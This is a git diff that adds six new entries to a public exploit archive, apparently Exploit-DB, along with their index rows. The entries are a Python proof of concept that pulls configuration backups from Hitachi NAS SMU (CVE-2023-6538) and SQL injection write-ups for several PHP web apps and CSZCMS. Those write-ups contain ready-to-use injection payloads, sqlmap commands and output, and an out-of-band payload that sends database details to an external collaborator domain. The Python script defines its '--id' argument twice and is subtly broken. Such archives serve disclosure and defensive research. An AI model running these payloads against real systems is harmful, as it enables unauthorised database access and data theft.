diff --git a/exploits/hardware/remote/51915.py b/exploits/hardware/remote/51915.py new file mode 100755 index 000000000..c99a2e359 --- /dev/null +++ b/exploits/hardware/remote/51915.py @@ -0,0 +1,92 @@ +# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure +# CVE: CVE-2023-6538 +# Date: 2023-12-13 +# Exploit Author: Arslan Masood (@arszilla) +# Vendor: https://www.hitachivantara.com/ +# Version: < 14.8.7825.01 +# Tested On: 13.9.7021.04 + +import argparse +from os import getcwd + +import requests + +parser = argparse.ArgumentParser( + description="CVE-2023-6538 PoC", + usage="./CVE-2023-6538.py --host --id --sso " + ) + +# Create --host argument: +parser.add_argument( + "--host", + required=True, + type=str, + help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" + ) + +# Create --id argument: +parser.add_argument( + "--id", + required=True, + type=str, + help="JSESSIONID cookie value" + ) + +# Create --sso argument: +parser.add_argument( + "--sso", + required=True, + type=str, + help="JSESSIONIDSSO cookie value" + ) + +# Create --id argument: +parser.add_argument( + "--id", + required=True, + type=str, + help="Server ID value" + ) + +args = parser.parse_args() + +def download_file(hostname, jsessionid, jsessionidsso, serverid): + # Set the filename: + filename = "registry_data.tgz" + + # Vulnerable SMU URL: + smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}" + + # GET request cookies + smu_cookies = { + "JSESSIONID": jsessionid, + "JSESSIONIDSSO": jsessionidsso + } + + # GET request headers: + smu_headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Dnt": "1", + "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1", + "Te": "trailers", + "Connection": "close" + } + + # Send the request: + with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: + with open(filename, 'wb') as backup_archive: + # Write the zip file to the CWD: + backup_archive.write(file_download.content) + + print(f"{filename} has been downloaded to {getcwd()}") + +if __name__ == "__main__": + download_file(args.host, args.id, args.sso, args.id) \ No newline at end of file diff --git a/exploits/php/webapps/51911.txt b/exploits/php/webapps/51911.txt new file mode 100644 index 000000000..b60c70998 --- /dev/null +++ b/exploits/php/webapps/51911.txt @@ -0,0 +1,18 @@ +# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi +# Date: 20-03-2024 +# Exploit Author: Shubham Pandey +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html +# Version: 1.0 +# Tested on: Windows, Linux +# CVE : CVE-2024-28595 +# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php. +# POC: +1. Here we go to : http://127.0.0.1/taskmatic/index.php +2. Now login with default Username and Password. +3. Visit the URL: +http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843 +WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||' +4. Page will load for 5 seconds because of time-based sql injection +# Reference: +https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md \ No newline at end of file diff --git a/exploits/php/webapps/51912.txt b/exploits/php/webapps/51912.txt new file mode 100644 index 000000000..93600a875 --- /dev/null +++ b/exploits/php/webapps/51912.txt @@ -0,0 +1,45 @@ +# Exploit Title: Blood Bank 1.0 - 'bid' SQLi +# Date: 2023-11-15 +# Exploit Author: Ersin Erenler +# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code +# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip +# Version: 1.0 +# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 +# CVE : CVE-2023-46022 + +------------------------------------------------------------------------------- + +# Description: + +The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases. + +Vulnerable File: /delete.php + +Parameter Name: bid + +# Proof of Concept: +---------------------- + +1. Intercept the request to cancel.php via Burp Suite +2. Inject the payload to the vulnerable parameters +3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b' +4. Example request for bid parameter: +--- + +GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: close +Referer: http://localhost/bloodbank/bloodinfo.php +Cookie: PHPSESSID= +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +--- +5. Database and version information is seized via Burp Suite Collaborator \ No newline at end of file diff --git a/exploits/php/webapps/51913.txt b/exploits/php/webapps/51913.txt new file mode 100644 index 000000000..82b1fd979 --- /dev/null +++ b/exploits/php/webapps/51913.txt @@ -0,0 +1,43 @@ +# Exploit Title: Simple Task List 1.0 - 'status' SQLi +# Date: 2023-11-15 +# Exploit Author: Ersin Erenler +# Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code +# Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip +# Version: 1.0 +# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 +# CVE : CVE-2023-46023 + +------------------------------------------------------------------------------- + +# Description: + +Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. + +Vulnerable File: /addTask.php + +Parameter Name: status + +# Proof of Concept: +---------------------- + +1. Register and login the system +2. Add a project and a task +3. Then use the sqlmap to exploit +4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db + +# SQLMap Response: +---------------------- +--- +Parameter: status (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||' + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||' +--- \ No newline at end of file diff --git a/exploits/php/webapps/51914.txt b/exploits/php/webapps/51914.txt new file mode 100644 index 000000000..d30e1a308 --- /dev/null +++ b/exploits/php/webapps/51914.txt @@ -0,0 +1,50 @@ +# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi +# Date: 2023-11-15 +# Exploit Author: Ersin Erenler +# Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql +# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645 +# Version: 1.0 +# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 +# CVE : CVE-2023-46024 + +------------------------------------------------------------------------------- + +# Description: + +Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. + +Vulnerable File: /index.php + +Parameter Name: searchdata + +# Proof of Concept: +---------------------- + +Execute sqlmap using either the 'searchdata' parameter to retrieve the current database: + +sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db + +SQLMap Response: +---------------------- +--- +Parameter: searchdata (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search= + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search= + + Type: stacked queries + Title: MySQL >= 5.0.12 stacked queries (comment) + Payload: searchdata=test%';SELECT SLEEP(5)#&search= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search= + + Type: UNION query + Title: Generic UNION query (NULL) - 15 columns + Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search= +--- \ No newline at end of file diff --git a/exploits/php/webapps/51916.txt b/exploits/php/webapps/51916.txt new file mode 100644 index 000000000..aa7a2dfbc --- /dev/null +++ b/exploits/php/webapps/51916.txt @@ -0,0 +1,42 @@ +# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated) +# Author: Abdulaziz Almetairy +# Date: 27/01/2024 +# Vendor: https://www.cszcms.com/ +# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download +# Reference: https://github.com/oh-az +# Tested on: Windows 11, MySQL, Apache + + +# 1 - Log in to the admin portal + +http://localhost/cszcms/admin/login + +# 2 - Navigate to General Menu > Member Users. + +# 3 Click the 'View' button next to any username. + +# 4 Intercept the request + +GET /cszcms/admin/members/view/1 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss +Upgrade-Insecure-Requests: 1 + + + +# 5 Modify the paramter + +/cszcms/admin/members/view/1 + +to + +/cszcms/admin/members/view/'or(sleep(10))# + +and url encode all characters + +/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 02b7bc95a..2f9486d79 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3642,6 +3642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,, 47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,, 10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware,,2009-12-13,,1,CVE-2009-4462;OSVDB-63325;OSVDB-61018,,,,, +51915,exploits/hardware/remote/51915.py,"HNAS SMU 14.8.7825 - Information Disclosure",2024-03-20,"Arslan Masood",remote,hardware,,2024-03-20,2024-03-20,0,CVE-2023-6538,,,,, 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,,2018-07-18,2018-07-18,0,,,,,, 36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",remote,hardware,,2011-12-08,2015-03-19,1,CVE-2011-4836;OSVDB-77588,,,,,https://www.securityfocus.com/bid/50978/info 51885,exploits/hardware/remote/51885.py,"Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-3710,,,,, @@ -15006,6 +15007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8053,exploits/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,webapps,php,,2009-02-12,,1,OSVDB-51978,,,,, 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz, +51912,exploits/php/webapps/51912.txt,"Blood Bank 1.0 - 'bid' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46022,,,,, 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,, 51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,, 51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,, @@ -16542,6 +16544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,, 51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,, 51863,exploits/php/webapps/51863.py,"CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,, +51916,exploits/php/webapps/51916.txt,"CSZCMS v1.3.0 - SQL Injection (Authenticated)",2024-03-20,"Abdulaziz Almetairy",webapps,php,,2024-03-20,2024-03-20,0,,,,,, 31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,, 11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,, 11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,, @@ -17932,6 +17935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10069,exploits/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",webapps,php,,2009-10-04,,1,CVE-2009-2269;OSVDB-55517,,,,, 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",2021-11-10,"İlhami Selamet",webapps,php,,2021-11-10,2021-11-10,0,,,,,, 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",2021-11-10,"Ragavender A G",webapps,php,,2021-11-10,2021-11-10,0,,,,,, +51911,exploits/php/webapps/51911.txt,"Employee Management System 1.0 - 'admin_id' SQLi",2024-03-20,"Shubham Pandey",webapps,php,,2024-03-20,2024-03-20,0,CVE-2024-28595,,,,, 48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,, 48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,, 51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,, @@ -29683,6 +29687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,, 50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,, 50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,, +51913,exploits/php/webapps/51913.txt,"Simple Task List 1.0 - 'status' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,,,,,, 51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,, 7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,, 50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,, @@ -30650,6 +30655,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9512,exploits/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,webapps,php,,2009-08-24,,1,,,,,, 37151,exploits/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",webapps,php,80,2015-05-29,2015-05-29,0,OSVDB-122580,,,,, 14203,exploits/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php,,2010-07-04,2010-07-04,1,CVE-2010-2715;CVE-2010-2714;OSVDB-66314;OSVDB-66313,,,,http://www.exploit-db.comtcwphpalbum-1.0.tar.gz, +51914,exploits/php/webapps/51914.txt,"Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46024,,,,, 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,, 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,, 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,,2021-02-15,2021-02-15,0,,,,,,